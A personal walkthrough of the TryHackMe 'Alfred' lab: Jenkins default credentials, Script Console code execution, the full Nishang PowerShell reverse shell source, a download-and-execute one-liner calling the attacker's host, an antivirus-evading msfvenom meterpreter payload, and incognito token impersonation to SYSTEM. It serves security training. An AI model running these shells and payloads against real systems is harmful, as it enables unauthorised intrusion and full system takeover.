Alfred writeup [thm]
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
Alfred, the second challenge in the Advanced Exploitation section in the Offensive Pentesting Path, is yet another excursion into Windows land. This challenge includes lots of shells, Metasploit, a cool privesc technique and Batman!
Task 1 Initial Access
In this room, we'll learn how to exploit a common misconfiguration on a widely used automation server(Jenkins - This tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made change to it). After which, we'll use an interesting privilege escalation method to get full system access.
Since this is a Windows application, we'll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we'll be using the reverse shell scripts
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
How many ports are open? (TCP only)
From the nmap man page:
-PS port list (TCP SYN Ping) This option sends an empty TCP packet with the SYN flag set. The default destination port is 80 (configurable at compile time by changing DEFAULT_TCP_PROBE_PORT_SPEC in nmap.h). Alternate ports can be specified as a parameter. The syntax is the same as for the -p except that port type specifiers like T: are not allowed. Examples are -PS22 and -PS22-25,80,113,1050,35000. Note that there can be no space between -PS and the port list. If multiple probes are specified they will be sent in parallel. The SYN flag suggests to the remote system that you are attempting to establish a connection. Normally the destination port will be closed, and a RST (reset) packet sent back. If the port happens to be open, the target will take the second step of a TCP three-way-handshake by responding with a SYN/ACK TCP packet. The machine running Nmap then tears down the nascent connection by responding with a RST rather than sending an ACK packet which would complete the three-way-handshake and establish a full connection. The RST packet is sent by the kernel of the machine running Nmap in response to the unexpected SYN/ACK, not by Nmap itself. Nmap does not care whether the port is open or closed. Either the RST or SYN/ACK response discussed previously tell Nmap that the host is available and responsive. On Unix boxes, only the privileged user root is generally able to send and receive raw TCP packets. For unprivileged users, a workaround is automatically employed whereby the connect system call is initiated against each target port. This has the effect of sending a SYN packet to the target host, in an attempt to establish a connection. If connect returns with a quick success or an ECONNREFUSED failure, the underlying TCP stack must have received a SYN/ACK or RST and the host is marked available. If the connection attempt is left hanging until a timeout is reached, the host is marked as down.
Let's try it out.
$: nmap -PS $target Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-25 22:05 CEST Nmap scan report for $target Host is up (0.041s latency). Not shown: 997 filtered ports PORT STATE SERVICE 80/tcp open http 3389/tcp open ms-wbt-server 8080/tcp open http-proxy
What is the username and password for the log in panel(in the format username:password)
When we go to the web server running on port 80 we are greeted with a picture of Bruce Wayne and the following text:
RIP Bruce Wayne
Donations to alfred@wayneenterprises.com are greatly appreciated.
Poor old Alfred.
The ms-wbt-server doesn't seem to respond but at port 8080 we find a Jenkins login page.
No need to brute force the credentials here, take a lucky guess. It's one of the worst and least secure user:password combinations imaginable.
Find a feature of the tool that allows you to execute commands on the underlying system.
When you find this feature, you can use this command to get the reverse shell on your machine and then run it:
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
By clicking around we find a thing called Script Console located at http://$target:8080/computer/(master)/script in which we can execute commands.
Script Console Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the ‘println’ command to see the output (if you use System.out, it will go to the server’s stdout, which is harder to see.) Example: println System.getenv("PATH") println "uname -a".execute().text This execution happens in the agent JVM. All the classes from all the plugins are visible. jenkins.*, jenkins.model.*, hudson.*, and hudson.model.* are pre-imported.
E.g
println System.getenv("PATH")
returns
C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
Download and serve up Powershell revshell
You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server
We need a PowerShell reverse shell. By googling for 'Invoke-PowerShellTcp.ps1' we find this nishang script:
function Invoke-PowerShellTcp { <# .SYNOPSIS Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. .DESCRIPTION This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port. The script is derived from Powerfun written by Ben Turner & Dave Hardy .PARAMETER IPAddress The IP address to connect to when using the -Reverse switch. .PARAMETER Port The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLE PS > Invoke-PowerShellTcp -Bind -Port 4444 Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. .EXAMPLE PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444 Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be listening on the given IP and port. .LINK http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html https://github.com/nettitude/powershell/blob/master/powerfun.ps1 https://github.com/samratashok/nishang #> [CmdletBinding(DefaultParameterSetName="reverse")] Param( [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] [String] $IPAddress, [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] [Int] $Port, [Parameter(ParameterSetName="reverse")] [Switch] $Reverse, [Parameter(ParameterSetName="bind")] [Switch] $Bind ) try { #Connect back if the reverse switch is used. if ($Reverse) { $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) } #Bind to the provided port if Bind switch is used. if ($Bind) { $listener = [System.Net.Sockets.TcpListener]$Port $listener.start() $client = $listener.AcceptTcpClient() } $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} #Send back current username and computername $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") $stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') $stream.Write($sendbytes,0,$sendbytes.Length) while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding $data = $EncodedText.GetString($bytes,0, $i) try { #Execute the command on the target. $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) } catch { Write-Warning "Something went wrong with execution of command on the target." Write-Error $_ } $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' $x = ($error[0] | Out-String) $error.clear() $sendback2 = $sendback2 + $x #Return the results $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() if ($listener) { $listener.Stop() } } catch { Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." Write-Error $_ } }
Save this as Invoke-PowerShellTcp.ps1. A neat thing about this script is that we can input host and port number as parameters upon execution. I think this is a nice touch.
Serve it up.
$: python3 -m http.server 8080
Start a listener.
$: nc -nlvp 1234 listening on [any] 1234 ...
We will now try to execute the above mentioned command in the Jenkins Script Console. How to format it so that it works?
Let's try this.
In the Script Console execute:
System.out "powershell iex (New-Object Net.WebClient).DownloadString('http://$tunip:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $tunip -Port 1234".execute().text
In our Python web server we see the GET request.
$target - - [25/May/2021 23:11:59] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
In our Netcat listener we got a shell.
connect to [$tunip] from (UNKNOWN) [$target] 49258 Windows PowerShell running as user bruce on ALFRED Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Program Files (x86)\Jenkins>
Phew!
What is the user.txt flag?
PS C:\Program Files (x86)\Jenkins> cd C:\Users PS C:\Users> dir Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 10/25/2019 8:05 PM bruce d---- 10/25/2019 10:21 PM DefaultAppPool d-r-- 11/21/2010 7:16 AM Public PS C:\Users> cd bruce/Desktop PS C:\Users\bruce\Desktop> dir Directory: C:\Users\bruce\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 10/25/2019 11:22 PM 32 user.txt PS C:\Users\bruce\Desktop> cat user.txt [REDACTED]
Task 2 Switching Shells
To make the privilege escalation easier, let's switch to a meterpreter shell using the following process.
Create a windows meterpreter revshell
Use msfvenom to create the a windows meterpreter reverse shell using the following payload
$: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=$tunip LPORT=4321 -f exe -o evil.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 381 (iteration=0) x86/shikata_ga_nai chosen with final size 381 Payload size: 381 bytes Final size of exe file: [REDACTED] bytes Saved as: evil.exe
This payload generates an encoded x86-64 reverse tcp meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly, and also to evade anti-virus products. An anti-virus product may not recognise the payload and won't flag it as malicious.
Download the revshell to the target machine
After creating this payload, download it to the machine using the same method in the previous step:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
Assuming our Python web server is still up running and that evil.exe lives in the same directory. In our previous netcat revshell execute:
PS C:\Users\bruce\Desktop> (New-Object System.Net.WebClient).Downloadfile('http://$tunip:8080/evil.exe','evil.exe') PS C:\Users\bruce\Desktop> dir Directory: C:\Users\bruce\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 5/26/2021 11:13 PM 73802 evil.exe -a--- 10/25/2019 11:22 PM 32 user.txt
Setup handler in Metasploit
Before running this program, ensure the handler is set up in metasploit:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run
Alright, it's time to fire up Metasploit.
$: msfconsole init [!] The following modules could not be loaded!../ [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go [!] /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go [!] Please see /home/nstr/.msf4/logs/framework.log for details. Call trans opt: received. 2-19-98 13:24:18 REC:Loc Trace program: running wake up, Neo... the matrix has you follow the white rabbit. knock, knock, Neo. (`. ,-, ` `. ,;' / `. ,'/ .' `. X /.' .-;--''--.._` ` ( .' / ` , ` ' Q ' , , `._ \ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' `._ , ' /_ ; ,''-,;' ``- ``-..__``--` https://metasploit.com =[ metasploit v6.0.36-dev ] + -- --=[ 2106 exploits - 1131 auxiliary - 357 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 8 evasion ] Metasploit tip: Enable HTTP request and response logging with set HttpTrace true [*] Starting persistent handler(s)... msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf6 exploit(multi/handler) > set LHOST tun0 LHOST => $tunip msf6 exploit(multi/handler) > set LPORT 4321 LPORT => 4321 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on $tunip:4321
Start Metasploit revshell
In the Netcat revshell:
PS C:\Users\bruce\Desktop> Start-Process "evil.exe"
In Metasploit we see:
[*] Sending stage (175174 bytes) to $target [*] Meterpreter session 1 opened ($tunip:4321 -> $target:49210) at 2021-05-27 00:20:57 +0200 meterpreter >
What is the final size of the exe payload that you generated?
[REDACTED]
Task 3 Privilege Escalation
Now that we have initial access, let's use token impersonation to gain system access.
Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe(think of this as an authentication process).
This access token consists of:
- user SIDs(security identifier)
- group SIDs
- privileges
amongst other things. More detailed information can be found here
There are two types of access tokens:
- primary access tokens: those associated with a user account that are generated on log on
- impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process
For an impersonation token, there are different levels:
- SecurityAnonymous: current user/client cannot impersonate another user/client
- SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client
- SecurityImpersonation: current user/client can impersonate the client's security context on the local system
- SecurityDelegation: current user/client can impersonate the client's security context on a remote system
where the security context is a data structure that contains users' relevant security information.
The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
There's more reading here
View all the privileges using whoami /priv
meterpreter > shell Process 1296 created. Channel 3 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\bruce\Desktop>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State =============================== ========================================= ======== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeSecurityPrivilege Manage auditing and security log Disabled SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled SeLoadDriverPrivilege Load and unload device drivers Disabled SeSystemProfilePrivilege Profile system performance Disabled SeSystemtimePrivilege Change the system time Disabled SeProfileSingleProcessPrivilege Profile single process Disabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled SeCreatePagefilePrivilege Create a pagefile Disabled SeBackupPrivilege Back up files and directories Disabled SeRestorePrivilege Restore files and directories Disabled SeShutdownPrivilege Shut down the system Disabled SeDebugPrivilege Debug programs Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled SeUndockPrivilege Remove computer from docking station Disabled SeManageVolumePrivilege Perform volume maintenance tasks Disabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled SeCreateSymbolicLinkPrivilege Create symbolic links Disabled C:\Users\bruce\Desktop>
You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let's use the incognito module that will allow us to exploit this vulnerability. Enter: load incognito to load the incognito module in metasploit. Please note, you may need to use the use incognito command if the previous command doesn't work. Also ensure that your metasploit is up to date.
C:\Users\bruce\Desktop>^Z Background channel 3? [y/N] y meterpreter > load incognito Loading extension incognito...Success.
To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available. Use the impersonate_token "BUILTIN\Administrators" command to impersonate the Administrators token. What is the output when you run the getuid command?
meterpreter > list_tokens -g [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM Delegation Tokens Available ======================================== \ BUILTIN\Administrators BUILTIN\Users NT AUTHORITY\Authenticated Users NT AUTHORITY\NTLM Authentication NT AUTHORITY\SERVICE NT AUTHORITY\This Organization NT AUTHORITY\WRITE RESTRICTED NT SERVICE\AppHostSvc NT SERVICE\AudioEndpointBuilder NT SERVICE\BFE NT SERVICE\CertPropSvc NT SERVICE\CscService NT SERVICE\Dnscache NT SERVICE\eventlog NT SERVICE\EventSystem NT SERVICE\FDResPub NT SERVICE\iphlpsvc NT SERVICE\LanmanServer NT SERVICE\MMCSS NT SERVICE\PcaSvc NT SERVICE\PlugPlay NT SERVICE\RpcEptMapper NT SERVICE\Schedule NT SERVICE\SENS NT SERVICE\SessionEnv NT SERVICE\Spooler NT SERVICE\swprv NT SERVICE\TrkWks NT SERVICE\TrustedInstaller NT SERVICE\UmRdpService NT SERVICE\UxSms NT SERVICE\WdiSystemHost NT SERVICE\Winmgmt NT SERVICE\WSearch NT SERVICE\wuauserv Impersonation Tokens Available ======================================== NT AUTHORITY\NETWORK NT SERVICE\AudioSrv NT SERVICE\DcomLaunch NT SERVICE\Dhcp NT SERVICE\DPS NT SERVICE\lmhosts NT SERVICE\MpsSvc NT SERVICE\netprofm NT SERVICE\nsi NT SERVICE\PolicyAgent NT SERVICE\Power NT SERVICE\ShellHWDetection NT SERVICE\W32Time NT SERVICE\WdiServiceHost NT SERVICE\WinHttpAutoProxySvc NT SERVICE\wscsvc meterpreter > impersonate_token "BUILTIN\Administrators" [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM [+] Delegation token available [+] Successfully impersonated user NT AUTHORITY\SYSTEM meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS
meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 396 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe 524 516 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 572 564 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 580 516 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe 608 564 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe 656 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe 668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe 676 580 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe 684 580 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe 772 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 808 1460 evil.exe x86 0 alfred\bruce C:\Users\bruce\Desktop\evil.exe 848 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 916 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 920 608 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe 936 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 980 1160 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 988 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1012 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1064 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 1120 1828 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 1160 1828 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 1208 668 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 1236 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1296 808 cmd.exe x86 0 alfred\bruce C:\Windows\SysWOW64\cmd.exe 1352 668 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe 1424 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1436 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe 1448 668 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe 1460 1828 powershell.exe x86 0 alfred\bruce C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 1480 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1624 668 jenkins.exe x64 0 alfred\bruce C:\Program Files (x86)\Jenkins\jenkins.exe 1716 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1756 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe 1796 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 1828 1624 java.exe x86 0 alfred\bruce C:\Program Files (x86)\Jenkins\jre\bin\java.exe 1836 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe 1856 668 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe 1912 668 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe 1940 524 conhost.exe x64 0 alfred\bruce C:\Windows\System32\conhost.exe 2344 772 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe 2704 668 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe 2748 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 3036 668 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe meterpreter > migrate 668 [*] Migrating from 808 to 668... [*] Migration completed successfully.
Read the root.txt file at C:\Windows\System32\config
meterpreter > shell Process 1416 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>cd C:\Windows\System32\config cd C:\Windows\System32\config C:\Windows\System32\config>dir dir Volume in drive C has no label. Volume Serial Number is E033-3EDD Directory of C:\Windows\System32\config 05/26/2021 11:04 PM <DIR> . 05/26/2021 11:04 PM <DIR> .. 10/25/2019 10:46 PM 28,672 BCD-Template 05/26/2021 11:14 PM 18,087,936 COMPONENTS 05/26/2021 11:21 PM 262,144 DEFAULT 07/14/2009 03:34 AM <DIR> Journal 05/26/2021 11:21 PM <DIR> RegBack 10/26/2019 12:36 PM 70 root.txt 05/26/2021 11:03 PM 262,144 SAM 05/26/2021 11:13 PM 262,144 SECURITY 05/26/2021 11:28 PM 38,797,312 SOFTWARE 05/26/2021 11:38 PM 10,485,760 SYSTEM 11/21/2010 03:41 AM <DIR> systemprofile 10/25/2019 09:47 PM <DIR> TxR 8 File(s) 68,186,182 bytes 6 Dir(s) 20,426,633,216 bytes free C:\Windows\System32\config>more root.txt more root.txt [REDACTED]
Conclusion
This was fun challenge. It's more of a follow along and fill in the blanks kind of challenge than a proper CTF but very nice nevertheless.
I did some stumbling along the way. First of all I tried to use the Powershell revshells found here and couldn't get any of them to work. I didn't read the question properly where there's a very clear hint that you should use Nishang's Invoke-PowerShellTcp.ps1.
Secondly I forgot about my Netcat revshell and tried in vain to download and start the meterpreter revshell from the Jenkins Script Console.
Besides from these two very sloppy mistakes everything went smoothly.
I would lite if I said that I completely understand Windows token impersonation now but for me the main take-away from Alfred is that this is a thing. Something to keep in mind and have in your bag of tricks and could maybe, at least theoretically, be used as privesc technique in the future.
Good challenge!
Tools used
- (Man)
- (Firefox)
- Nmap
- Jenkins Script Console
- Nishang's Invoke-PowerShellTcp.ps1
- Python
- Netcat
- Powershell
- Msfvenom
- Metasploit